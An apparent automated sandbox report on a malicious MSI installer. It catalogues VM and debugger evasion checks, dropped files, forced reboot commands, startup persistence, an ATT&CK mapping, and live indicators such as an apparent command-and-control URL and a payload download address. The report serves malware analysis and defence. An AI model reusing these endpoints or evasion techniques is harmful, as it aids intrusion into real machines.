Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\msiexec.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\SysWOW64\msiexec.exe TID: 5176	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\LtfQdc.exe TID: 1388	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Users\user\LtfQdc.exe TID: 1668	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Users\user\LtfQdc.exe TID: 1668	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Users\user\LtfQdc.exe TID: 4272	Thread sleep count: 9361 > 30	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI5FAD.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\garurumon.bz2	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI5962.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi472B.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI58C4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI60A8.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi4601.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI67ED.tmp	Jump to dropped file

Source: C:\Users\user\LtfQdc.exe

Code function: 18_2_00CC9A50 rdtsc

18_2_00CC9A50

Source: C:\Users\user\LtfQdc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\LtfQdc.exe

Window / User API: threadDelayed 9361

Jump to behavior

Source: C:\Users\user\LtfQdc.exe

API coverage: 4.9 %

Source: C:\Windows\SysWOW64\msiexec.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\LtfQdc.exe

Code function: 18_2_00C9565E GetSystemInfo,

18_2_00C9565E

Source: C:\Users\user\LtfQdc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\Users\user\Desktop FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\Users\user FullSizeInformation	Jump to behavior

Source: LtfQdc.exe, 00000012.00000002.513324037.00000000074D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Server
Source: LtfQdc.exe, 00000012.00000002.513324037.00000000074D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: zj!Enterprise Server without Hyper-V
Source: LtfQdc.exe, 00000012.00000002.513324037.00000000074D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: zj2Windows Essential Server Solutions without Hyper-VX9
Source: LtfQdc.exe, 00000012.00000002.513324037.00000000074D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Standard Server without Hyper-VK9
Source: LtfQdc.exe, 00000012.00000002.513324037.00000000074D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: zj3Standard Server without Hyper-V (core installation)
Source: LtfQdc.exe, 00000012.00000002.513324037.00000000074D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: zj5Enterprise Server without Hyper-V (core installation)
Source: LtfQdc.exe, 00000012.00000002.513324037.00000000074D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: zj5Datacenter Server without Hyper-V (core installation)
Source: LtfQdc.exe, 00000012.00000002.513324037.00000000074D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: zj!Datacenter Server without Hyper-V
Source: LtfQdc.exe, 00000012.00000002.513324037.00000000074D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: HPC Edition without Hyper-V
Source: 6f14c7.msi.1.dr	Binary or memory string: 01234567890.0.0.0.%dVMware, Inc.VMware Virtual PlatformVMware7,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IROOT\CIMV2SELECT * FROM Win32_ComputerSystemSELECT * FROM Win32_BIOSManufacturerModelVersionGetting system informationManufacturer [Model [BIOS [IsWow64Processkernel32Software\Microsoft\Windows NT\CurrentVersionSYSTEM\CurrentControlSet\Control\ProductOptionsCurrentMajorVersionNumberCurrentMinorVersionNumberCurrentVersionCurrentBuildNumberReleaseIdCSDVersionProductTypeProductSuiteWinNTServerNTSmall BusinessEnterpriseBackOfficeCommunicationServerTerminal ServerSmall Business(Restricted)EmbeddedNTDataCenterPersonalBladeEmbedded(Restricted)Security ApplianceStorage ServerCompute Server Failed to create IWbemLocator object. Error code: \\Could not connect to WMI provider. Error code: Failed to initialize security. Error code: Could not set proxy blanket. Error code: WQLWMI Query failed: []. Error code:

Source: C:\Users\user\LtfQdc.exe

Code function: 18_2_00D170E0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

18_2_00D170E0

Source: C:\Users\user\LtfQdc.exe

Code function: 18_2_00CC9A50 rdtsc

18_2_00CC9A50

Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00D1848B mov eax, dword ptr fs:[00000030h]	18_2_00D1848B
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00D184BC mov eax, dword ptr fs:[00000030h]	18_2_00D184BC
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00D0A7C6 mov ecx, dword ptr fs:[00000030h]	18_2_00D0A7C6

Source: C:\Users\user\LtfQdc.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00D170E0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		18_2_00D170E0
Source: C:\Users\user\LtfQdc.exe	Code function: 18_2_00CFE294 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		18_2_00CFE294

Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C shutdown -r -f -t 60	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c shutdown /r /t 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -f -t 60	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 1 /f	Jump to behavior

Source: LtfQdc.exe, 00000012.00000002.513744848.0000000007578000.00000004.00000800.00020000.00000000.sdmp, LtfQdc.exe, 00000012.00000002.517440456.00000000078C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: LtfQdc.exe, 00000012.00000002.513744848.0000000007578000.00000004.00000800.00020000.00000000.sdmp, LtfQdc.exe, 00000012.00000002.517440456.00000000078C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerT

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Users\user\LtfQdc.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Users\user\LtfQdc.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Users\user\LtfQdc.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Users\user\LtfQdc.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Users\user\LtfQdc.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Users\user\LtfQdc.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Users\user\LtfQdc.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Queries volume information: C:\Users\user\msedge_elf.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\LtfQdc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\LtfQdc.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	18_2_00D1A23D
Source: C:\Users\user\LtfQdc.exe	Code function: EnumSystemLocalesW,	18_2_00D164CD
Source: C:\Users\user\LtfQdc.exe	Code function: EnumSystemLocalesW,	18_2_00D1A493
Source: C:\Users\user\LtfQdc.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	18_2_00D1A530
Source: C:\Users\user\LtfQdc.exe	Code function: GetLocaleInfoW,	18_2_00D1A7F0
Source: C:\Users\user\LtfQdc.exe	Code function: EnumSystemLocalesW,	18_2_00D1A783
Source: C:\Users\user\LtfQdc.exe	Code function: EnumSystemLocalesW,	18_2_00D1A8C5
Source: C:\Users\user\LtfQdc.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	18_2_00D1A9B7
Source: C:\Users\user\LtfQdc.exe	Code function: GetLocaleInfoW,	18_2_00D1A910
Source: C:\Users\user\LtfQdc.exe	Code function: GetLocaleInfoW,	18_2_00D1AABD

Source: C:\Users\user\LtfQdc.exe

Code function: 18_2_00CFE406 cpuid

18_2_00CFE406

Source: C:\Users\user\LtfQdc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\LtfQdc.exe

Code function: 18_2_00CFF235 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

18_2_00CFF235

Source: C:\Users\user\LtfQdc.exe

Code function: 18_2_00CC2070 GetVersionExW,GetProductInfo,__Init_thread_header,GetNativeSystemInfo,

18_2_00CC2070

Source: C:\Windows\SysWOW64\msiexec.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Replication Through Removable Media	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	1 Replication Through Removable Media	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	2 Registry Run Keys / Startup Folder	12 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	2 Registry Run Keys / Startup Folder	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Timestomp	NTDS	146 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	14 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	141 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 File Deletion	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	141 Masquerading	DCSync	31 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	12 Process Injection	/etc/passwd and /etc/shadow	1 Remote System Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\shi4601.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\shi472B.tmp	0%	ReversingLabs
C:\Users\user\LtfQdc.exe (copy)	0%	ReversingLabs
C:\Users\user\digimn.bz2	0%	ReversingLabs
C:\Users\user\garurumon.bz2	31%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\msedge_elf.dll (copy)	31%	ReversingLabs	Win32.Trojan.Generic
C:\Windows\Installer\MSI5548.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI57F8.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI58C4.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI5962.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI59EF.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI5FAD.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI60A8.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI6750.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI67ED.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI6D02.tmp	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://HTTP/1.1	0%	Avira URL Cloud	safe
http://html4/loose.dtd	0%	Avira URL Cloud	safe
http://20.203.138.85/megazord2023/index.php	0%	Virustotal		Browse
http://.css	0%	Avira URL Cloud	safe
https://amxx1515cabreun23.asxo	0%	Avira URL Cloud	safe
https://amxx1515cabreun23.L	0%	Avira URL Cloud	safe
http://20.203.138.85/megazord2023/index.php	0%	Avira URL Cloud	safe
http://.jpg	0%	Avira URL Cloud	safe
https://amxx1515cabreun23.asxo/	0%	Avira URL Cloud	safe
http://20.203.138.85	0%	Avira URL Cloud	safe
https://amxx1515cabreun23.asxo4	0%	Avira URL Cloud	safe
https://collect.installeranalytics.comhttp://collect.installeranalytics.comhttps://installeranalytic	0%	Avira URL Cloud	safe
http://20.203.138	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s3-w.us-east-1.amazonaws.com	52.217.160.129	true	false	high
collect.installeranalytics.com	54.205.202.31	true	false	high
mzrdmodlonnce.s3.amazonaws.com	unknown	unknown	false	high
amxx1515cabreun23.asxo	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://20.203.138.85/megazord2023/index.php	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://collect.installeranalytics.com/	false		high
https://mzrdmodlonnce.s3.amazonaws.com/digivolve.msi	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	shi4601.tmp.2.dr	false	Avira URL Cloud: safe	low
https://HTTP/1.1	shi4601.tmp.2.dr	false	Avira URL Cloud: safe	low
https://amxx1515cabreun23.L	LtfQdc.exe, 00000012.00000002.517399028.00000000078A3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://amxx1515cabreun23.asxo	LtfQdc.exe, 00000012.00000002.517399028.00000000078A3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.thawte.com/cps0/	AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI58C4.tmp.1.dr, MSI5548.tmp.1.dr, MSI6750.tmp.1.dr, MSI59EF.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI5962.tmp.1.dr, MSI57F8.tmp.1.dr, MSI60A8.tmp.1.dr	false		high
https://www.thawte.com/repository0W	AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI58C4.tmp.1.dr, MSI5548.tmp.1.dr, MSI6750.tmp.1.dr, MSI59EF.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI5962.tmp.1.dr, MSI57F8.tmp.1.dr, MSI60A8.tmp.1.dr	false		high
http://stackoverflow.com/q/11564914;	LtfQdc.exe, 00000012.00000002.520729168.000000006B75C000.00000020.00000001.01000000.00000006.sdmp, garurumon.bz2.2.dr	false		high
https://www.advancedinstaller.com	AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI58C4.tmp.1.dr, MSI5548.tmp.1.dr, MSI6750.tmp.1.dr, MSI59EF.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI5962.tmp.1.dr, MSI57F8.tmp.1.dr, MSI60A8.tmp.1.dr	false		high
https://amxx1515cabreun23.asxo/	LtfQdc.exe, 00000012.00000002.513667683.0000000007547000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://collect.installeranalytics.com	AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI5548.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI60A8.tmp.1.dr	false		high
http://.css	shi4601.tmp.2.dr	false	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	LtfQdc.exe, 00000012.00000002.513324037.00000000074D1000.00000004.00000800.00020000.00000000.sdmp, LtfQdc.exe, 00000012.00000002.516138475.000000000763A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://.jpg	shi4601.tmp.2.dr	false	Avira URL Cloud: safe	low
http://20.203.138.85	LtfQdc.exe, 00000012.00000002.513324037.00000000074D1000.00000004.00000800.00020000.00000000.sdmp, LtfQdc.exe, 00000012.00000002.517336158.000000000788C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://stackoverflow.com/q/2152978/23354	LtfQdc.exe, 00000012.00000002.520729168.000000006B75C000.00000020.00000001.01000000.00000006.sdmp, garurumon.bz2.2.dr	false		high
https://amxx1515cabreun23.asxo4	LtfQdc.exe, 00000012.00000002.513667683.0000000007547000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://collect.installeranalytics.com	AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI5548.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI60A8.tmp.1.dr	false		high
https://collect.installeranalytics.comhttp://collect.installeranalytics.comhttps://installeranalytic	AOEI-LEHOLLZCZW.msi, MSI6D02.tmp.1.dr, MSI67ED.tmp.1.dr, 6f14c4.msi.1.dr, MSI5548.tmp.1.dr, MSI5FAD.tmp.1.dr, 6f14c7.msi.1.dr, MSI60A8.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://20.203.138	LtfQdc.exe, 00000012.00000002.517367234.0000000007898000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
20.203.138.85	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
54.205.202.31	collect.installeranalytics.com	United States	14618	AMAZON-AESUS	false
52.217.160.129	s3-w.us-east-1.amazonaws.com	United States	16509	AMAZON-02US	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	778344
Start date and time:	2023-01-05 13:17:09 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	AOEI-LEHOLLZCZW.msi
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.rans.evad.winMSI@15/41@3/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 14.8% (good quality ratio 13.7%) Quality average: 57.7% Quality standard deviation: 25.4%
HCA Information:	Successful, ratio: 68% Number of executed functions: 12 Number of non-executed functions: 133
Cookbook Comments:	Found application associated with file extension: .msi

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:18:06	API Interceptor	3x Sleep call for process: msiexec.exe modified
13:18:17	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LtfQdc.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
20.203.138.85	garurumon.dll	Get hash	malicious	Browse	20.203.138.85/megazord2023/index.php
20.203.138.85	DRTO10179793.msi	Get hash	malicious	Browse	20.203.138.85/megazord2023/index.php
54.205.202.31	DRTO10179793.msi	Get hash	malicious	Browse	collect.installeranalytics.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
s3-w.us-east-1.amazonaws.com	https://form.123formbuilder.com/6265172/form	Get hash	malicious	Browse	52.217.199.113
	http://znaad7u8yzaqhmmxx-desjardins.siteintercept.qualtrics.com	Get hash	malicious	Browse	54.231.234.113
	DRTO10179793.msi	Get hash	malicious	Browse	3.5.17.120
	file.exe	Get hash	malicious	Browse	52.217.33.108
	file.exe	Get hash	malicious	Browse	54.231.193.137
	file.exe	Get hash	malicious	Browse	52.217.32.76
	file.exe	Get hash	malicious	Browse	54.231.171.1
	SecuriteInfo.com.Variant.Jaik.110184.18050.14160.exe	Get hash	malicious	Browse	52.217.207.17
	https://github.com/Roberhdjsjshhs/aternos/releases/download/video/nUcN4Rs3h2k9.exe	Get hash	malicious	Browse	52.216.207.99
	file.exe	Get hash	malicious	Browse	52.217.107.100
	http://www.xaxnv.com/SHvmP	Get hash	malicious	Browse	52.216.43.113
	gabCqSerd5.exe	Get hash	malicious	Browse	52.217.235.89
	https://gist.github.com/iGlitch/083823db93cb424d97c4d27a6c5bf259#file-death-bat	Get hash	malicious	Browse	52.217.91.124
	file.exe	Get hash	malicious	Browse	52.216.78.116
	file.exe	Get hash	malicious	Browse	52.217.100.44
	uiVa6TG1Hn.exe	Get hash	malicious	Browse	52.217.192.193
	v1eXHfmaLk.exe	Get hash	malicious	Browse	52.216.228.240
	http://ww1.citymanger.com/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fHx8fHw2MzllMjM0NjJmYThlfHx8MTY3MTMwODEwMi4yMTA3fDM2MTBiOTQ4NzRjZTMyNTNjZDM5NzMwMjBlMTBhZDU0YzdmZDY0YjN8fHx8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fHx8MHwwfHwwfHx8MHwwfFcxMD18fDF8VzEwPXxlNDg2YmQzNzVjNTUwMTRkZTNlMjFmY2UxMGNmN2I3Nzk1OTNhMTMyfDB8ZHAtdGVhbWludGVybmV0MTJfM3BofDB8MA%3D%3D&query=Commercial%20Credit%20Cards&afdToken=ChMI6Yzm7ruB_AIVsRRZBR3qCgFbElPcHWC0A69lhJq2UizR9de-aa78nx-1lwOsWjZvaE-ugjc18fdM9m5hvPrFP3svaxihZe9H5weiqNvx6XuUvWQVxLP2S-kQyZo6jyKt6HcRLYNtAw&pcsa=false&nb=0&nm=37&nx=205&ny=92&is=530x497&clkt=117	Get hash	malicious	Browse	52.217.16.188
	file.exe	Get hash	malicious	Browse	52.217.192.1
	PO#20221215.exe	Get hash	malicious	Browse	52.217.138.113

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	cLCu0dvgxy.elf	Get hash	malicious	Browse	20.46.32.101
	nsc6A7rADm.elf	Get hash	malicious	Browse	20.94.237.211
	Avis_Virement Remmitance Advice.html	Get hash	malicious	Browse	13.107.237.45
	Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Get hash	malicious	Browse	13.107.43.12
	Ej3vSx3p8Y.exe	Get hash	malicious	Browse	13.107.237.60
	Client.jpg.exe	Get hash	malicious	Browse	20.219.15.124
	https://app.uizard.io/p/78d796e3	Get hash	malicious	Browse	13.107.42.14
